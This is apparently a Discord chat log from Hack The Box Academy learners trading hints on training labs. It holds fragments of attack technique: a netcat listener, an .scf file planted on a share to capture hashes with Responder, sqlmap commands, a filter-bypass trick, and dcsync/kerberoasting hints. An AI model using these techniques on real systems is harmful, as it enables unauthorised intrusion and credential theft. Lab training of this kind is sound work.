#modules
Awesome... im starting to feel smarter already . lol
@rough radish I will warn you, this module is difficult haha
Especially the skill assessment
But you can do it
@raven cairn all is to me, but, the measure of which I have learned something is whether or not it was obvious to me at first glance. (stole that quote from somewhere, lol)
.
There is no flag here. Get back to hacking!
so, this seems like cheating... i assume these are all in the same module i am learning
root@NIX02:/root# locate flag.txt
/root/cron_abuse/flag.txt
/root/kernel_exploit/flag.txt
/root/screen_exploit/flag.txt
root@NIX02:/root#
the idea is to practice each technique, its on the student to decide if they want to work through each technique or go through and submit flags just to get it done. some boxes will be presented like this because they are merely there for practicing the concepts shown in the module sections. skills assessment boxes are built more tightly
ok, I plan to practice. Priv Esc is a major weak point for me. Besides I'm not buying cubes to cheat myself lol
ya I figured the majority of people would be here to practice and not just submit flags 🙂
I really like the File Inclusion module. I'm working on the final lab rn and it's really well done!
hello everyone
THIS QUESTION: " Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? (Write the extensions as '.ext', in alphabetical order separated by spaces ".ext1 .ext2 .ext3")"
i tried to do this : " ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://archive.68.183.45.211:31747/indexFUZZ"
but return with zero results ,why?
@proud sparrow Try running that same scan but against the other vhosts you found from the previous question. One of them should work.
i did man but its the same
listen i watched video on youtube i did the same as he did he was solving the same section same question but for me didnt find results like zero
now i tried to restart my pwn but now its worse its fucked up
i tried to start from the first question and nothing shows...i wanna show you
Hello, everyone. I am having trouble understanding the error messages that I am getting on the Web Requests module. I am trying to update one of the api entries to "flag", but I get either the "unknown field entry" error message or the ">"
It is supposed to be self-explanatory. I first tried: "curl -X PUT http://SERVER:PORT/api.php/city/flag because I assumed that the answer wanted me only to change the "city_name" field in the table. However, I got the "unknown field entry" error message. I don't know what that means. lol
@weary forum Can i see your command?
LFI module completed! Done the last assignment without help! Although I'm still unsure when exactly the RCE worked. I can't reproduce it.
Is it one at the time command like with a php session poisoning?
Hi all, I am struggling to find the password for the first account of the broken authentication final module. I filtered out rockyou.txt based on the password requirements and got 40 password but none of them is allowing me to access that user. Could someone lend a hand?
@hallow otter DM me 🙂
Has anyone finished the Command Injections skills assessment? I'm at the point where I get a "Permission denied" error for my command and I'm not sure how to bypass this
@rotund gust it will take several techniques to effectively cat the flag. Maybe try first running a simple command like ls. I think if you just add some apostrophes it should work, i.e. l's'
I see, thank you so much as always
Hello guys
I have just completed the Hacking wordpress module, i am on the skill assessment (final test)
The target box generated is not wordpress though, it looks more like bootstrap.
@rich sequoia try exploring the website, you should find a link to a vhost that is using wordpress
Hi guys,
Broken authentication, skill assessment.
Can anyone please give me any hints.
I found only two users(s** and g**) from message.php, i tried using all the different username wordlists.
I tried tampering session cookie, for support user, it gives me error that role is incorrect for the user.
I tried brute forcing registration form, i got few mores users that gets message, invalid usernames. I’m not sure if invalid username means they are existing users or not, i tried them on message page, does not work
I tried brute forcing password, after applying password policy to rockyou.txt. No password match for any of the user. Filtered pass list has about 18-20 passwords.
Could anyone point me to the right direction.
Thanks in advance.
@uncut stratus Did you use country codes to find usernames?
Hey, I'm in the information gathering module attempting to enumerate the vhosts of www.inlanefreight.htb, I used the dnsrecon/namelist.txt file as my word list and it returned '1910' lines, I'm pretty sure I'm getting off on the wrong track, any guidance?
Hello all. Looking for some general guidance on Skills Assessment for Broken Authentication. I have escalated from ‘nobody’ and now attempting to escalate to the proper person to get to the admin panel. Have tried several different things, just curious if I am doing the right things or if I have generally missed the mark on what is expected. Anybody willing to help, DM me and I will let you know where I am at and what I have attempted thus far. Thanks!
I need assistance with sqlmap essentials case #3 cookie value (Id)
I run sqlmap -u "http://157.245.46.51:32390/case3.php" --cookie="I'd=1*" and I get some payloads but none of them show flag. I get one that dumps the entire table (32 rows) and another value at the bottom that I've tried to use as a cookie and i get error.
fuff
Figured it out. Just FYI
hi everyone! Is anyone having connectivity problems with the VPN for the new AD module? I get disconnected every 10seconds and can't interact with the machines
im not sure if the problem is on my end
i tripped over my ethernet cable the other day and im not sure if I messed up my hardware
speedtest seem to run fine ...
I'm struggling with the first question of the skills assessment for Using Web Proxies. It says I need to enable the button on the /lucky.php page. I have tried modifying the HTML with my inspect element tool, and that seems to activate the button, but I don't get any flag returned. I'm not sure how to utilize my web proxy tools for this question if they're relevant
DM me and we can work thru this
it took changing it 6 or 7 times for me to get the flag
I'll try that. It suggests finding a way to make modifying the page easier since multiple clicks are necessary. How might I go about doing that?
I think there is a way in repeater to automate it.
@lethal atlas can I ask u some?
of course
whats your command to connect?
hi
ssh root@host
hello
i close my academy tab, i think its bug
thanks bro
is there anyone
Where's everybody
@everyone
hey
Where's everybody
@here
@here
@here @here @here
@everyone @everyone @everyone
what do you need friend?
++kick 871555635840446474
『ғʟʏ』Tuấn Anh ✈ got the boot!
I really want to chat with someone
I really want to chat with someone
i am sorry
That's not the way to do it. Do it again and you'll be banned from the server.
oh no
@high zinc
Yeah... that's one way to get yourself banned 😂
problem solved. I terminated the pwnbox instance and it solved the problem. I guess you cant have pwnbox on and be connected to the vpn

Hello, has someone has a problem to find the FQDN of the nameserver on the "Active Subdomain Enumeration" (module INFORMATION GATHERING - WEB EDITION ). Any admin could help me? I already put the IP of the box on my hosts but I am not allowed to find the nameserver of inlanefreight.htb
glad you're liking it! how far are you? strap yourself in for the 2 skills assessments, they're like doing 2 full mini AD-focused pentests 🙂
Is there any specific order I should do the modules in?
for the last exercise of the hydra module ||the one with Harry Potter||
How long is it suppose to take ? I use the username generator and cupp with only the Name and Lastname and reduce the wordlist according to the rule but I just take way too long...
dm me
start with the basics and work your way up or follow a Path but I think you should get the basics first
shouldnt take long. Its usually something in the password list creation that gets skipped over. DM me for help
Hey. im in the web attacks module at the bypassing encoded references section and abit stuck.
Im trying to follow along with the steps in the module but when I do, I dont get a post request as expected, I get a GET request instead without the info in to replay? any ideas what im doing wrong?
if you're an absolute beginner i'd start with Learning Process, Linux Fundamentals, Windows Fundamentals, Intro to Networking, Intro to Web Applications, Web Requests, Introduction to Python3, Setting Up, Information Gathering - Web Edition, Getting Started, and then the Junior Penetration Tester path from start to finish. a few modules aren't done yet in that path but will be released soon. If you have fundamentals down and want to learn AD then Intro to AD followed by AD Enumeration and Attacks and then the AD Enumeration skill path. If you want to learn web and have fundamentals down then do the Bug Bounty path. it really depends on where you are starting from. hope that helps
i'm sure others can weigh in on their own journey too 🙂
Thank you very much 😄
any time!
I would also recommend doing the starting point machines while doing academy
when clicking a pdf you dont get a post request?
For the Command Injections - Identifying Filters Module ("Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is NOT blacklisted by the web application?") every answer I submit is rejected as invalid even though I've verified that the operator is correct multiple through Burp. Is there a particular format the answer needs to be submitted in? I've tried URL encoding it as well, but that still doesn't work.
@knotty falcon Yes , it is in the format of xxx-xxxx
well I am at 15min and still got nothing so...
Ok thank you, I'll give this a shot.
DM me and lets look at your list creations
The magic is in how you created the password lists
Still no luck in trying to get credit in that format. Can I DM you or can you be more specific?
Sure
Can anyone help me "Windows Privilege Escalation" module, "Interacting with Users" section?
The hint says "Look for interesting shares that are writable by our user.". I run "net share" command, saw shares and found out that "Department Shares" is writable. Double checked that with "accesschk" tool.
However, when trying to create a file @Inventory.scf in the root of the share it says I don't have rights. I'm stuck with the section 😦
@rustic sage my memory might be wrong, but i think there is a directory on the share called IT or something like that. Basically it's the only shared folder that you allowed to write to
Once you put the .scf file there you should be able to capture the hash with Responder
@west canopy when running "accesschk -s -w C:\Department Shares" it says that the only place where "htb-student" can write is the root of C:\Department Shares.
I'll try manually to create a file, but if that works out then it is strange why accesschk didn't show that
I actually just used file explorer to search through the shares
I'll try your way and will respond in few minutes
You were right, Public/IT is writable by htb-student, thanks 🙇♂️
However, the open question then, why accesschk -s didn't show that 
That's the output for the folder where I was able to create a file by htb-student
.\accesschk64.exe -s -w 'C:\Department Shares\Public\IT\'
C:\Department Shares\Public\IT
RW BUILTIN\Users
RW WINLPE-SRV01\Administrator
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators
RW WINLPE-SRV01\sccm_svc
Requesting assistance with "Predictable Reset Token" module, specifically confirmation of the +-1 second aspect of challenge 1
No, I get a GET request.
oh yeah, that is different than the examples. Sometimes you cant follow along exactly
@hallow remnant DM me 🙂
Did you ever figure out the flag for case5 I also got the same result as you where it looks like another flag got mixed into also, is that supposed to be like that?
Hi all, tell me I'm on the Active Directory Enumeration and attack module, on the Privileged Access section. I have a problem with the Cypher Raw code. Is anyone blocked too?
@broken warren feel free to DM me I might be able to help
Hi, try the Match p2 only
I tried but it does not work. I was helped and I saw that the raw cypher code is not good. There are too many brackets.
anyone I can ask some about sql?
yes! I'm doing this module rn
I'm at reading file section
Hi
do you reach Union Clause section?
yes
did you do the question?
yes
ok.
Careful about posting too much explicit work; this might be more appropriate as a DM
Requesting assistance on the "Broken Authentication" -> "Bruteforcing Cookies" part 2; my understanding is that this question implies we leverage CyberChef. However, I don't recognize the schema that the cookie is employing (and presume that there are layers of encoding taking place to obfuscate the cookie's contents). Welcome guidance.
I really like the module. I´ve read through most of it but haven´t done any exercises. I was playing around with CME though, because it is a tool I need to be better acquainted with. So far, the content is incredible :)! I also really like the stories about irl pentest attack paths. I didn´t know you could use an SCF file with responder to capture an NTLMV2 hash! I think the module also complements the PEN-300 and CRTO really well. Knowing how to enumerate paths for lateral movement is something I wasn´t too well versed in( I always just clicked stuff on bloodhound and hoped the attack path would be in the graph)
Academy is my favorite learning platform for IT stuff, and I think this is my favorite module
:)
Did not try other alternatives as I don't know them yet, but i'm kind of addicted to complete all modules right now.
Y’all are burning through them! We’ve got loads more coming though
Cant wait!
Is there a way to receive update about them like a newsletter or email or something?
we do have a newsletter https://resources.hackthebox.eu/hack-the-box-newsletter-sign-up ...we don't always announce modules currently, but that should change soon
Sign up for the newsletter to stay updated with Hack The Box!
thanks!
can someone help with the web proxy module ive been lost for a few now and cant seem to move forward.
active subdomain enumeration been stuck on question one for toooo long anyone help?
Maybe I can help. Where are you stuck6
?*
i found the high level vuln i just cant seem to figure out how to use it
Oh, sorry I read web requests, I didn't do web proxies yet. But soon 😛
ahh okk
nice
I'm stuck right at the beginning of sql injection final skills assessment. I'm trying to trigger an error to have a hint about the vuln to exploit, but nothing gives. This is surely not a blind injection. Any tip?
@sweet heron EDIT: I'm a doofus, I was thinking SQLMap Essentials. Sorry
I've read source of index.php and check every other file available. Even fuzz the /pages but nothing.
Ok, np
OMG does anyone think they made the Linux Local Privilege Escalation final assessment too hard? I cant even get flag #1. Only a reference in the .bash_history file I'm pulling my hair out here
@rough radish Try searching for hidden files and folders inside /home/htb-student 🙂
Found it, I feel like a fool..... ok noted, don't exclude hidden items
I've been spoiled in finding a hidden webpage, but I can't access it. I can't find any hostname to add to /etc/hosts and I also found it with ffuf. I can access the code just fine in burpsuite, but I'm only getting a white page on firefox (with no source-code). Resetting target doesn't work. What am I missing? (sqli module skills assignment)
still stuck
yes. But further.
dm
Is it on purpose that on the DCSync section the AD enumeration and attacks module, the host is not running ADWS, I did managed to do the tasks on the host, but I was not able to anything with the linux host where I was able to ssh in.
there was error with the secretsdump.py
and also built-in ad cmdlets did not work
Me again with "Windows Privilege Escalation" module and "Miscellaneous Techniques" section 🙂
I've managed to get the SYSTEM shell and using lazagne (I tried mimikatz as well) I get the hashdump of passwords. When trying to decrypt it with both john and hashcat, I'm not getting the cleartext password.
So the question is:
- what must be the user to which I need to grab the password? (it says nothing about username in the question there)
- am I missing something and I need to do something else?
P.S. there are some troubles with understanding the "Windows Privilege Escalation" course 😦 Would be great to have the content more "explained" there.
anyone here having a similar issue ? im trying to do the XSS session hijacking room and when entering IP all im getting is a black background
is that the Cross-site Scripting (XSS) module?
hi, i’m stuck on Login brute forcing Module in last section “skill Assessment - service login” I try all combination of user and password with hydra but nothing I can’t find the credential I use cupp for generate password and username-anarchy for generate users. Any hint? Thank you
when you made your password list using cupp. did you select y on numbers, special characters and l33t?
nope
I would recreate your list then
I use that options but with only name and surname I have more than 70000 login tries, and I use regex for reduce the length of the wordlist
And username-anarchy generate me 15 usernames
hello everyone
who can give me a hint about how treat this question from SQL fundamentals module:
We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.
basically, I need to understand how import what I guess is a variable {$coon} with PHP include command?
you need to find out which file is imported by looking for "include" or "require" and then get this file from the server and look into it. in there you will find your answer
- follow the hint for this task verbatim. It is really good!
1.5. make sure to use 1337 - make sure that the passwords in the password list meet the company's password policy.
- take the usernames you talked about and use Hydra to finish the task.
ok, thanks
your password list should be less than 6000
what module and section is this?
make sure your vpn is connected
i tried on htb-cloud where vpn is already connected
im leaving the course i think, gonna try another
hmmm I had some issues connecting this morning to a machine as well
its bug i suppose
that mean i tried to connect via ssh, but it was just connecting through MySQL right?
i feel stupid xd
We are here to learn
Thank u dude
no dumb questions, purpose of Academy is to learn. even the module authors are constantly learning new stuff as we work 🙂
Can someone help me with Facebook accounts?
there are no modules about facebook here.
hahaha
Hi guys,
The hint for the 4th flag in the LLPE skills assessment is not enough for my thick skull. It feels like I have tried everything for the last 24 hours
Any nudges' in the right direction would be a massive help.
Logging into the host-manager seems like a rabbit hole.
I have nmap scanned everything, including the barcode of the can of Pepsi on my desk!
wait no hints i may have figured this out
It's amazing what a bit of sleep will do.... got flag4
How am I supposed to do the phishing part of (XSS MODULE), when I cant listen to port 80, anyone have tips? - sudo nc -lvnp 80
retrying local 0.0.0.0:80 : Address already in use
change the port
kind of disappointed in the Server side attacks module skill assessment. spent about 3 days doing that module and i was able to grasp all the information. I love the part with the python exploitation. The module itself was amazing, def my second favorite one behind the file upload one.
im just a bit disappointed in the skill assessment. was able to finish it in like 5 minutes.
if something feels easy, it doesn't mean it's disappointing, but rather that you have not only learned the subject matter, but can use it appropriately
everything is easy if you know the solution
haha true, i feel that. i guess i am leveling up even though i still dont feel it
sorry for late reply, but yes it is the xss module
going to try and take my knowledge onto the mainsite now
try some of the recommended machines
oh trueeeee i forgot they recommend certain machines for what is taught in the module!
I'm not getting any traffic there since the code defaults for the port 80 as http, I'm unable to add the new port (let's say 21043) xss injection
you can modify the code to reflect the port you are using
sad that most of the machines are retired and I dont have VIP there
Got final flag #5 !!! the sense of pride I have right now!
I think it would be cool to have academy machines. Kinda like starting point but machines you unlock after completing certain mods.
yes
And instead of having the walk through, point people back to the mod, so if they needed to crack a password it would send them back to the module and section
Is there a simple way to force firefox not to add the http(S) there, I keep getting disconnected as it forces the S part
do you add the http yourself?
the only time i see id automatically add it is while using zap
in firefox settings you can disable the https only feature
I put 10.129.118.53/phishing/send.php and it adds https there
For some reason, the flag I enter in sqlmap case 5 is not working (even after --no-cast with -T flag5). Any help?
I have this setting, and it keeps doing it
dm me
if you have yours set that way then it should not be doing that.
Hello friends
Hello there!
yo!
I'm hosting a php server and when I connect to it through the /phishing/send.php, I get this error while listening, what am I doing wrong?
10.129.118.57:58680 [404]: (null) /phishing/index.php - No such file or directory
10.129.118.57:58680 Closing
And why is the port changing from the original command? - sudo php -S 0.0.0.0:21304
[Tue Apr 26 20:56:16 2022] PHP 7.4.21 Development Server (http://0.0.0.0:21304) started
So in the 10:129:118:58680 , the 58680 is the ephemeral port coming from the target I believe. It's just a random port number that the target is using, but it is still trying to reach your PHP server
Do you have an index.php file in your PHP server?
Even if I host as: sudo php -S 0.0.0.0:21304/phishing/index.php | I keep getting the error
Ya is the file in the same place you started your server?
─[eu-academy-2]─[10.10.14.201]─[htb-ac395349@pwnbox-base]─[/tmp/tmpserver]
└──╼ [★]$ ls
creds.txt index.php
If I set the page -> /phishing/send.php | and put 10.10.14.201/index.php | I get 200 okay, but nothing is written in creds.txt | if I put 10.10.14.201/phishing/index.php I get the error above
try taking the phishing part out and run the server from the same directory(local) as the index.php file
I remember this section took me a few tries to get it to work properly
I dont know what any of you guys are talking about.
Did you ask a question?
I mean im trying to get in to hacking or coding but have no idea how to
thats a good start, probably a better way to start that convo tho
whats convo
The attempt to get help or ask a question
its short for "conversation" 🙂
How are we suppose to know a vulnerable parameter uses non-standard boundaries like in sqlmap case 6? Without the hint which tells what prefix to use, how could I find out?
Good luck with getting started!
hey, does anyone know the release date for any of the Coming Soon modules?
Leaking the source code, manual enumeration, or fuzzing
how can i get into a lost facebook account
oh we have a program to get into facebook accounts
could be a browser problem, a cube problem, is the mod completed? Which mod is it?
Need some help in web attacks module, advanced file disclosure section question. Couldn't get the flag using provided dtd file (I changed the file entity to "file"///var/www/html/flag.php").
hey can u help me please?
i also get stuck in Blacklist Filters / File Upload Attacks
can anyone help please?
solved
me too. There is a lot of people complaining about this section. I wonder if they revised it.
I am trying to do the Skill Assessment in the Broken Authentication module. I have identified the (only?) other account and how to log into it using a cookie. How can I progress from here?
Fuzzing directories/accounts results in nothing new
could anyone provide advice/point in the right direction
Hey guys need hint on SHELLS & PAYLOADS (reverse shells chapter)
DM me and lets see where you are stuck
DM me
If you still need help DM me
I need some help with Burp Intruder, im stuck on the two last parts of assessing 'Using Web Proxies'-module
what question are you stuck on ?
Can I DM you so I dont spoil anything?
sure
I need someone to help me with buffer overflow in linux skills assessment. I am missing something. I can get a reverse shell but only as htb-student.
I am trying to do the windows priv esc skills assessment 1, but I am having issues with the command injection. It is only letting me execute certain commands and not those that I need to use.
I haven't done that specific module but it sounds like you are missing setting the user id to root.
You can DM me. Walk me through what you are doing.
@severe birch were you able to get a foothold?
got it
37 modules complete.
Nice bro
Heck yeah!
@lethal atlas what's next? 🙂
gonna run thru the windows buffer overload and finish out tier 0
then back to HTB to work on another machine.
Hathor?
not sure yet lol
Were you able to get this to work with just curl IP:port -H 'Authorization: Basic YWRtaW46YWRtaW4='? I am having the exact same problem you reported, but trimming the Copy as cURL request to only have this info didn't give me a flag
@swift cove Feel free to DM me if you're still stuck 🙂
I am stuck on last question of attacking web applications with ffuf -Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag? - I have used lots of wordlists - found many possible values - but all of them are returning "You don't have access!" - anybody DM me and give me a hint on what I am doing wrong and confirm the wordlists I have used are not good one? Thanks
@stiff tiger last question of the skills assessment?
yes last question of skills assessment.
@stiff tiger DM me 🙂
Any little hint on the sqlmap skills assessment? I didn't find any attack vector yet. I've intercepted all requests with burp and clicked a lot. No parameters found. Same with ffuf for pages, params, extensions, etc. I checked HTML code too. Search bars aren't working.
I must have missed something!
@sweet heron try adding an item to your cart and intercept the request , this should give you a clue as to the attack point
OK thanks a lot for the hint. Might've missed it cause I remember doing it! Once again, you save the day!
np! The actual attack takes a bit of fine tuning to make it work so if you get stuck feel free to DM me
@manic zealot the question may be solved using both methods shown in the section. If you couldn't solve it using one method then try the other
Also, as the question mentions, the flag is at /flag.php not in /var/www/html/flag.php
i might be stupid but i cant figure out the dang password for the Appointment
any help be great????
hellooo, im just curious if someone could help me with a http request question i have.
@wide torrent sure, what's up?
how do you move up and down dir in http
i can get 'ls' and other commands to work but im clearly blanking on how to move in and out of directories
So if we are doing a command injection against a website, we can't really navigate around and change our current working directory. The command we inject will always be inside the webroot.
is it ok if i share ss here
yea
ahh that makes alot of sense ty
but every command you run , you will always be at the same location
if that makes sense
it's not like a Terminal where we can move around and change our current directory
so you need that + to chain commands together im guessing
no its been fine with plain text its just for the web proxies lab, the repeating requests section
@west canopy do you have a good cheat sheet or link for commands like this still having some issues
Not really, in the case of the web proxies module it is mostly just using linux commands to enumerate the file system
cat flag.txt , etc.
so if i wanted to move into a second dir from node_modules what would i use
so if we found a directory inside of node_modules , we can just call it fake_directory
we would need to do: ls node_modules/fake_directory
ok sorry im still learning the syntax i really appreciate the help
np. Also i would suggest looking in the root directory.
For all of you bash experts . . .
I am performing a hashing function and then want to count the number of characters in the variable that contains the hashed value.
If I use number=${#var}, I get an error.
But, if I use number=$(echo $var | wc -c), I get the correct value.
Does anyone know why that is happening?
worked for me
hmm. I was working on the "Flow Control - Loop" question and when I used the ${#} it returned the following message:
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
139916277388672:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:
try to google it may be u will find some way to solve it
is this one specific to any module
@feral gyro Thanks. My review of some of the literature on bash says that there are some sh implementations whose ${#var} doesn't work properly with multi-byte characters (would return the length in bytes instead of characters). Perhaps that was the issue. I guess I'll just stick with the longer function until I figure it out.
I need some help with the LFI, basic bypasses question.
Hi guys, anyone knows if we are able to reset our progress for a module, so that we can reattempt the challenges again?
👍
I believe if you go to the Dashboard and go to your completed modules, you can select the "Retake Module" button.
hey there, thanks for helping out! Got it ! 🙂
Excellent. For me retaking some of the modules would just be an exercise in frustration 🙂
ahhaa, Have to brush up those that I've not touched in months
Oh, the retake module doesn't reset the answered questions?
Yikes. Now why would they do that. Kinda defeats the purpose of retaking a module!
Ah, was thinking of attempting the challenges again without the answers
I was thinking they might've made some changes as some of my queries are correct but the answer is different from my previous attempted challenges
That sucks. Sounds like a good suggestion to make to HTB though. I guess they don't want to screw up people's progress on learning streams in the event they don't re-complete a retaken module.
That makes sense too.
Thanks for your help @plucky current !
np
@rough radish Feel free to dm me 🙂
Hello guys, I am doing SQL Map Essentials as my last module to finish the BASIC TOOLSET. I am now at the first task and I have the feeling that I have to do SQL-Injection module first that I am even able to do this module , is that right ? I literally dont know where to start at the first task. I did the scan but dont know what to do after.
It is better to do sqlmap after completing sqli
it is my opinion
understanding how to perform manual sql injections before automating it , is quite good
I need assistance on sqlmap skills assessment, I can't even find where to start. I've used dev tools and found two jQuery with parameters. But those both fail, I can't seem to intercept requests through burp for the checkout or contact entries.
Hello, everyone. I am having problems with the "Web Requests" Module, specifically the CRUD part of the module. I am supposed to add "flag" to the city API, and then delete any city name, and then I am supposed to search for flag to retrieve the flag.
But this is what I am getting:
That's me searching for the flag after I updated and deleted a city
The question is: "First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag."
Any nudge on the command injection assessment? can't find the injection point!
dm me
If I remember correctly I had to delete more than one city
oh, ok. the instructions are unclear because it says that you should delete a city, but it doesn't say more than 1
so you had to remove it from /etc/hosts or did you have to change the IP every time you reset? Was the scan fast for you when it worked?
For the Password Attacks - Network Services section is there a suggested user.list and password.list to use? Currently using rockyou.txt for passwords and top-usernames-shortlist.txt and it's already taking forever
Look in resources
It hasnt worked for me, but im guessing we are supposed to use those
You were right just downloaded the resources and unzipped it
@livid pier when you say it hasn't worked for you what do you mean by that? lol
Either all these password attacks are going to take forever or I am doing something wrong because I am still waiting on a username and password combo for the first question and it has been running for quite some time
I have the same problem you describe. additionally, i was doing the ssh attack and it wont ever finish. my box runs out of time.
I had this problem with other password cracking modules too.
Hi, my first hint: you don't have to solve the questions in the given order. One attack might work faster than others. (I've solved it in the given order and it worked with the lists from resources) Second hint: when you've found a valid login, what can you do to reduce the number of tries? Update: Have to correct my answer. I have used the password.list and another one from the seclists folder
Anyone able to give me a hint on Active Directory Attacks "Attacking Domain Trusts - Child -> Parent Trusts From Linux"? I have read over the section and gone through the examples, I can get a system shell but I don't understand how I am supposed to get the hash for the BRoss user.
what do you mean by finding a valid login?
@west canopy try kerberoasting
oh actually i remembered wrongly what i meant to say you have admin you can do dcsync
Are you saying if we find a valid login and password we can remove it from both lists?
Yes I've been awake so long time, I'm messing things kerberoast gives rc4 hash and dcsync gives you the ntlm straight away.. Anyway I'm going to sleep now 🙂
@shadow verge just solved it, thanks so much!
When you've found a valid login, you might find "something" to reduce either the users or the passwords. Not sure how much I can write here. But I'm sure you'll know what I mean when you think about it. Log in and look around a bit and you'll know what I've meant. Don't think too complicated. In case you still don't know what I've meant, feel free to write me a PM
Try adding an item to your cart and intercept the request , this should give a clue as to where to inject
No problem
anybody available to answer a question about the command injection skills assessment?
@neat snow i can try, what's up?
is there a way to run responder the tcp server other than port 80, i use the pwn boxes and it errors out bc port 80 is in use
Hey there
I am totally stuck in the Broken Authentication module, section Bruteforcing Cookies, the second question. I can't find a way to decrypt that cookie...
could somebody help me please?
hey yall, im just getting started and dont know how to add the VPN on mac?
openvpn isnt a command in macos so i cant add the configuration
@delicate lynx you're probably going to want a Kali or Parrot VM
if i cant use virtualbox, what should i use?
nobody?
Have you tried with sudo responder? You can turn off in responder.conf , but I’m not aware of any option to change the port….
yes i ran it with sudo, im assuming whats happening is bc the pwnbox runs over port 80 it interferes with the TCP server (ive had this same issue when trying to host web servers while using it). is it possible to turn off the TCP server function of Responder
responder.conf**
Should be under /etc , or /usr/share/responder/Responder.conf …
yes that worked appreciate it
so for the box i need to do a file inclusion and use the responder to authenticate. this issue is i cant listen over port 80 bc it shows busy ( im assuming bc its on pwn the box) . any ideas how i can work around this on pwnbox?
Not really, the only possibility would be use https for inclusion?
Hello I'm stuck on the loop Flow control question of the bash scripting module the loop i made works but i keep getting a decrypt error
error being :*** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. bad decrypt 140546881238400:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:
@sudden lotus feel free to DM me 🙂
You can add a domain xxx.htb to your /etc/hosts and the subdomain as well (yyy.xxx.htb) so your PC knows where to route. And make sure your ffuf command is run against the subdomain. I don't remember about the scan speed. DM me, I'll go check the module back because I don't remember a lot.
Pretty sure no, but does someone know if you can tell sqlmap to "import" scan results from another ip/port (the box run out before I finished the scan). Changing the dir name maybe?
Working the Bloodhound module... trying to import the new data from ILF_BH.zip - not working out so well. There is no bloodhound.dump file. Help please!
Hi guys, I have a comprehension issue with the Automated Scanning of the File Inclusion module question. When using ffuf utilizing the example provided, I only get things like " </avg>," etc. What in tarnation am I to do with that? Can someone give the command to scan either with ffuf or gobuster so I can understand this?
What command did you use?
@sweet heron I PM-ed you so not to spoil anything for any one else
thanks man that's what I was missing I'm at the final assessment now
Good to hear, good job!
were you able to get the flag? I have no issue removing a city or changing a city's name to flag. I deleted like 3 cities, and still when I search for flag I see the same results {city name : flag, country: US} EDIT: Figured it out, I actually wasn't deleting. was using -x instead of -X facepalm
case matters lol
Hi guys. I have a problem with unlocking modules. I have enough credits but when I click "unlock" nothing happens. Any help?
Is it on purpose I can't run SharpHound at AD Enumeration and Attacks Skills assessment, I noticed ADWS is not running?
nvm I figured it out, firefox in kali vm didn't want to cooperate, probably something to do with js
Still stuck in broken auth bruteforcing cookies.... Could somebody help me? can't find that magic byte
hey all on the XSS session hijacking module.... my script.js is bang on, same with index.php... as per the information in module, but when im sending the request im just not getting the cookie....tried various times, even tried doing as a curl request, same thing.
Hi guys, I'm about to finish the Active Directory Enumeration Path. There is left just one question from the Active Directory LDAP module, which is "What non-default privilege does the htb-student user have?"
This was supposed to be the easiest question but nothing worked, I tried from simple "whoami /priv" to using BloodHound (which is not covered in the module) but I don't know what else I need to do.
Could anyone help me?
I had the same problem. I had to use a HtB instance instead of a VM because of the BloodHound version
Hello all, im just starting out in the academy and im in the setting up module, specifically the windows section and trying to run the command "choco install pkg1 pkg2 pkg" however it always seem to fail:-
Everything has been successful up until this point, can anyone help please 🙂
Server-side Attacks
I guess I can try that. How do I sudo on the provided VM? I don’t have the password to the user account.
there is a file with the credentials on the desktop
Man - I’m a dope. Thank you so much!
And did you create SSH keys to get the files onto the pwnbox?
ok
Can you dm me the content of script.js you are using?
I believe you need to set the same port inside script.js to fetch index.php (ie:5555) that your PHP server is listening on
contact customer support
Hey guys, I want to open this link http://xxx.xxx.xxx.xxx:31039/profile_images/shell.phar jpg?cmd=id
but my browser decode it to:
i cant open it
if i encode %20 with %2520 and use it in the link
it doesn't work
how can fix this
Can someone dm me about intro to assembly?
I'm stuck at skills assessment first question.
Still working the bloodhound module... having a hard time figuring out how to query groups with high privileges outside of Domain Admins. The question is: "Using the attached data find the most privileged group after the Domain Admins group."
Why append jpg with a space? What happens if you omit that part?
this is a command Injection against a Whitelists from Webserver which just allow specific file extensions
Hello, could somebody give me a little hint on the .zip-file decryption tasks in Password Attacks? I'm stuck at section "Protected Files" as well as on " Password Attacks Lab - Medium" and I wonder if I'm stuck at both for the same reason, because both involve zip-file cracking.
if anyone is available to assist me with the session hijacking portion of the XSS module please let me know
Were you able to extract the hash, using John?
yes, i have the hash, and i tried many wordlists, like rockyou, the one from the section resources, some mutations... but no hit 😦
If I remember correctly, you need to use the mutated list. I'll confirm when I get home
Try running your command from an elevated powershell 🙂
The bloodhound zip files provided in the VM did not work on my VM either, I had to use the pwnbox.
I had a buddy have the exact same issue... I'm tempted to think it's a network issue somehow. Are you on VM or Pwnbox?
hey, I'm kinda stuck at the Directory Indexing of Hacking WordPress module.
I have to locate a flag in the enumerable directory of the site
but the only one I can enumerate is wp-includes which is just... huge
very huge
Am I doing something wrong or the flag is really hide in this mess ?
@dry pumice Yes it's hidden in the mess . Feel free to DM if you need a hint
The same thing happens with my browser. I can enter a URL encoded address, but once the page loads it will sometimes remove the encoding.
DM me 🙂
Word to the wise, I downloaded a wordlist and did not check the contents. It had the HTML code of the www it was on and not the word list. Caused me two days of headache. Check your downloads!
@sweet heron This is why I was pulling my hair out.
figured out XSS module yay
My account was suspended because I wanted to change my name, I sent a message to support and to whom there is no response
Can someone shed some light on log poisoning via php web shell?
Cannot understand what I am doing wrong when I try to change the User-Agent to a php web shell, it is not showing up in the logs.
@languid fjord hey
Hey I am trying to work on Windows Privilege Escalation Skills Assessment - Part II - I am on the last question and need to find the ntlm hash of the disabled local admin user but I am having trouble when dumping hashes the way I know. Can anyone give me a nudge on this? Thanks.
@severe birch I was able to get it using pwdump
Ok I'll give that a go - thanks
any have issues sometimes getting mysql database login to work on a pwnbox? doing sql injection fundamentals right now and not being able to login
nvm, reset both boxes and it works now 🤷♂️
